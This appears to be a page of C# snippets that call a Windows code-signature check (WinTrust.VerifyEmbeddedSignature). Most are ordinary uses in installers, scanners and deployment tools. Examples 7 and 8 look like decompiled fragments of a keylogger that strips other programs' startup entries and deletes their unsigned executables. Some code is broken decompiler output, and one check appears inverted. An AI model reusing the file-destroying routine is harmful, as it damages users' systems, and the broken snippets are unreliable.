Example #1
0
        public static bool Verify(string assemblyPath, X509Certificate2 assemblyCertificate = null)
        {
#if DEBUG
            return(true);
#endif

            try
            {
                var isVerified = WinTrust.VerifyEmbeddedSignature(assemblyPath, WinVerifyTrustResult.Success);

                X509Certificate2 cert = new X509Certificate2(assemblyPath);

                if (assemblyCertificate == null)
                {
                    var assembly = Assembly.GetExecutingAssembly();
                    assemblyCertificate = new X509Certificate2(assembly.Location);
                }

                return(isVerified && cert.Equals(assemblyCertificate));
            }
            catch (Exception e)
            {
                LogProvider.Log.Error(typeof(CertificateHelper), $"Could not verify assembly at '{assemblyPath}'", e);
            }

            return(false);
        }
Example #2
0
        public static void CheckForSignedExec()
        {
            Process proc     = Process.GetProcessById(ParrentProcessId);
            string  filename = proc.MainModule.FileName;

            Console.WriteLine("[Digital Signature]: {0}", WinTrust.VerifyEmbeddedSignature(filename));
            Console.WriteLine("Parent process path: " + filename);
        }
Example #3
0
        static public bool CheckFile(string filename)
        {
            // check digital signature
            bool ret = WinTrust.VerifyEmbeddedSignature(filename);

            // do some other checks - for example verify the subject
            // X509Certificate2 cert = new X509Certificate2(filename);
            return(ret);
        }
        protected internal static string GetSignatureStatus(string Path)
        {
            if (!WindowsFileSystemUtils.NeedsSignature(Path))
            {
                return("");
            }
            string sigStatus = WinTrust.VerifyEmbeddedSignature(Path);

            return(sigStatus);
        }
Example #5
0
        protected internal static string GetSignatureStatus(string Path)
        {
            if (!NeedsSignature(Path))
            {
                return(string.Empty);
            }
            string sigStatus = WinTrust.VerifyEmbeddedSignature(Path);

            return(sigStatus);
        }
Example #6
0
 public ScanStatus Scan(FileCache file, ref string result)
 {
     if (WinTrust.VerifyEmbeddedSignature(file.Path) == WinVerifyTrustResult.Success)
     {
         result = "Success";
         return(ScanStatus.Stop);
     }
     else
     {
         result = "No digital cert";
         return(ScanStatus.Continiue);
     }
 }
Example #7
0
 public static void StartupFucker(string regkey, int type)
 {
     try
     {
         RegistryKey key;
         if (type == 1)
         {
             key = Registry.CurrentUser.OpenSubKey(regkey);
         }
         if (type == 2)
         {
             key = Registry.LocalMachine.OpenSubKey(regkey);
         }
         foreach (string str in key.GetValueNames())
         {
             try
             {
                 string expression = key.GetValue(str).ToString();
                 if (expression.Contains("-"))
                 {
                     if (expression.Contains("\""))
                     {
                         expression.Replace("\"", string.Empty);
                     }
                     try
                     {
                         expression = Strings.Split(expression, " -", -1, CompareMethod.Binary)[0];
                     }
                     catch (Exception exception1)
                     {
                         ProjectData.SetProjectError(exception1);
                         ProjectData.ClearProjectError();
                     }
                 }
                 if (expression.Contains("\""))
                 {
                     expression = expression.Split(new char[] { '"' })[1];
                 }
                 if (!expression.Contains(Application.ExecutablePath))
                 {
                     RemoveKey(type, str, regkey, expression);
                     if (!WinTrust.VerifyEmbeddedSignature(expression))
                     {
                         Startupkilled++;
                         DestroyFile(expression);
                     }
                 }
             }
             catch (Exception exception2)
             {
                 ProjectData.SetProjectError(exception2);
                 ProjectData.ClearProjectError();
             }
         }
     }
     catch (Exception exception3)
     {
         ProjectData.SetProjectError(exception3);
         ProjectData.ClearProjectError();
     }
 }
Example #8
0
        public static bool IsFileMalicious(string fileloc)
        {
            bool flag;
            int  num2;

            try
            {
                int num3;
Label_0001:
                ProjectData.ClearProjectError();
                int num = -2;
Label_0009:
                num3 = 2;
                if (!fileloc.Contains(Application.ExecutablePath))
                {
                    goto Label_0028;
                }
Label_001D:
                num3 = 3;
                flag = false;
                goto Label_0221;
Label_0028:
                num3 = 5;
                if (!fileloc.Contains(SplitFunzioni.KeyloggherExePatch))
                {
                    goto Label_0047;
                }
Label_003C:
                num3 = 6;
                flag = false;
                goto Label_0221;
Label_0047:
                num3 = 8;
                if (!fileloc.Contains("cmd"))
                {
                    goto Label_0067;
                }
Label_005B:
                num3 = 9;
                flag = true;
                goto Label_0221;
Label_0067:
                num3 = 11;
                if (!fileloc.Contains("wscript"))
                {
                    goto Label_0088;
                }
Label_007C:
                num3 = 12;
                flag = true;
                goto Label_0221;
Label_0088:
                num3 = 14;
                if (!fileloc.Contains(RuntimeEnvironment.GetRuntimeDirectory()))
                {
                    goto Label_00A9;
                }
Label_009D:
                num3 = 15;
                flag = true;
                goto Label_0221;
Label_00A9:
                num3 = 0x11;
                if (!WinTrust.VerifyEmbeddedSignature(fileloc))
                {
                    goto Label_00C5;
                }
Label_00B9:
                num3 = 0x12;
                flag = false;
                goto Label_0221;
Label_00C5:
                num3 = 20;
                if (!(fileloc.Contains(Environment.GetEnvironmentVariable("USERPROFILE")) | fileloc.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))))
                {
                    goto Label_00F9;
                }
Label_00ED:
                num3 = 0x15;
                flag = true;
                goto Label_0221;
Label_00F9:
                num3 = 0x17;
                FileAttributes attributes = File.GetAttributes(fileloc);
Label_0104:
                num3 = 0x18;
                if ((attributes & FileAttributes.System) != FileAttributes.System)
                {
                    goto Label_0120;
                }
Label_0114:
                num3 = 0x19;
                flag = true;
                goto Label_0221;
Label_0120:
                num3 = 0x1b;
                if ((attributes & FileAttributes.Hidden) != FileAttributes.Hidden)
                {
                    goto Label_013C;
                }
Label_0130:
                num3 = 0x1c;
                flag = true;
                goto Label_0221;
Label_013C:
                num3 = 30;
                flag = false;
                goto Label_0221;
Label_0152:
                num2 = 0;
                switch ((num2 + 1))
                {
                case 1:
                    goto Label_0001;

                case 2:
                    goto Label_0009;

                case 3:
                    goto Label_001D;

                case 4:
                case 5:
                    goto Label_0028;

                case 6:
                    goto Label_003C;

                case 7:
                case 8:
                    goto Label_0047;

                case 9:
                    goto Label_005B;

                case 10:
                case 11:
                    goto Label_0067;

                case 12:
                    goto Label_007C;

                case 13:
                case 14:
                    goto Label_0088;

                case 15:
                    goto Label_009D;

                case 0x10:
                case 0x11:
                    goto Label_00A9;

                case 0x12:
                    goto Label_00B9;

                case 0x13:
                case 20:
                    goto Label_00C5;

                case 0x15:
                    goto Label_00ED;

                case 0x16:
                case 0x17:
                    goto Label_00F9;

                case 0x18:
                    goto Label_0104;

                case 0x19:
                    goto Label_0114;

                case 0x1a:
                case 0x1b:
                    goto Label_0120;

                case 0x1c:
                    goto Label_0130;

                case 0x1d:
                case 30:
                    goto Label_013C;

                case 0x1f:
                    goto Label_0221;

                default:
                    goto Label_0216;
                }
Label_01DB:
                num2 = num3;
                switch (((num > -2) ? num : 1))
                {
                case 0:
                    goto Label_0216;

                case 1:
                    goto Label_0152;
                }
            }
            catch (object obj1) when(?)
            {
                ProjectData.SetProjectError((Exception)obj1);
                goto Label_01DB;
            }
Label_0216:
            throw ProjectData.CreateProjectError(-2146828237);
Label_0221:
            if (num2 != 0)
            {
                ProjectData.ClearProjectError();
            }
            return(flag);
        }
Example #9
0
        private static void DeployApplication(
            DeployAppMode mode,
            DeviceInfo deviceInfo,
            IAppManifestInfo manifestInfo,
            DeploymentOptions deploymentOptions,
            string packageFile,
            bool disconnect = true)
        {
            if (PackageType.Framework != manifestInfo.PackageType && WinTrust.VerifyEmbeddedSignature(packageFile))
            {
                throw new Exception(
                          string.Format(
                              CultureInfo.CurrentUICulture,
                              Resources.InvalidPackaging,
                              new object[0]));
            }

            var connectableDevice =
                new MultiTargetingConnectivity(CultureInfo.CurrentUICulture.LCID).GetConnectableDevice(
                    deviceInfo.DeviceId);
            var device        = connectableDevice.Connect(true);
            var systemInfo    = device.GetSystemInfo();
            var deviceVersion = new Version(systemInfo.OSMajor, systemInfo.OSMinor);

            if (manifestInfo.PlatformVersion.CompareTo(deviceVersion) > 0)
            {
                device.Disconnect();
                throw new Exception(
                          string.Format(
                              CultureInfo.CurrentUICulture,
                              Resources.XapNotSupportedOnDevice,
                              new object[0]));
            }

            var flag = IsTargetApplicableforMdilGeneration(
                connectableDevice,
                deviceVersion,
                manifestInfo,
                packageFile);

            ApplySideloadFlags(manifestInfo, ref deploymentOptions);
            if (mode == DeployAppMode.Install)
            {
                if (device.IsApplicationInstalled(manifestInfo.ProductId))
                {
                    if (manifestInfo.PackageType == PackageType.Framework)
                    {
                        return;
                    }

                    device.GetApplication(manifestInfo.ProductId).Uninstall();
                }

                foreach (var str in DependencyFinder.GetAppDependencyPackages(packageFile))
                {
                    var manifestInfo1 = ReadAppManifestInfoFromPackage(str);
                    DeployApplication(
                        DeployAppMode.Install,
                        deviceInfo,
                        manifestInfo1,
                        DeploymentOptions.OptOutSD,
                        str,
                        false);
                }
            }

            var app = (IRemoteApplication)null;

            if (mode == DeployAppMode.Update)
            {
                app = device.GetApplication(manifestInfo.ProductId);
            }

            var typeOfApp        = DetermineAppType(packageFile);
            var applicationGenre = ((int)deploymentOptions).ToString(CultureInfo.InvariantCulture);
            var iconPath         = ((int)manifestInfo.PackageType).ToString(CultureInfo.InvariantCulture);

            switch (mode)
            {
            case DeployAppMode.Install:
                break;

            case DeployAppMode.Update:
                break;
            }

            var path = (string)null;

            try
            {
                if (IsMdilFirst(typeOfApp, manifestInfo))
                {
                    if (flag)
                    {
                        path        = GenerateNDeployMdil(packageFile, null, typeOfApp, manifestInfo);
                        packageFile = path;
                    }

                    switch (mode)
                    {
                    case DeployAppMode.Install:
                        app = device.InstallApplication(
                            manifestInfo.ProductId,
                            manifestInfo.ProductId,
                            applicationGenre,
                            iconPath,
                            packageFile);
                        break;

                    case DeployAppMode.Update:
                        app.UpdateApplication(applicationGenre, iconPath, packageFile);
                        break;
                    }
                }
                else
                {
                    switch (mode)
                    {
                    case DeployAppMode.Install:
                        app = device.InstallApplication(
                            manifestInfo.ProductId,
                            manifestInfo.ProductId,
                            applicationGenre,
                            iconPath,
                            packageFile);
                        break;

                    case DeployAppMode.Update:
                        app.UpdateApplication(applicationGenre, iconPath, packageFile);
                        break;
                    }

                    if (flag)
                    {
                        path = GenerateNDeployMdil(packageFile, app, typeOfApp, manifestInfo);
                    }
                }
            }
            finally
            {
                if (!GlobalOptions.LeaveBehindOptimized && !string.IsNullOrWhiteSpace(path) && File.Exists(path))
                {
                    File.Delete(path);
                }
            }

            if (GlobalOptions.LaunchAfterInstall && app != null)
            {
                app.Launch();
            }

            if (!disconnect)
            {
                return;
            }

            device.Disconnect();
        }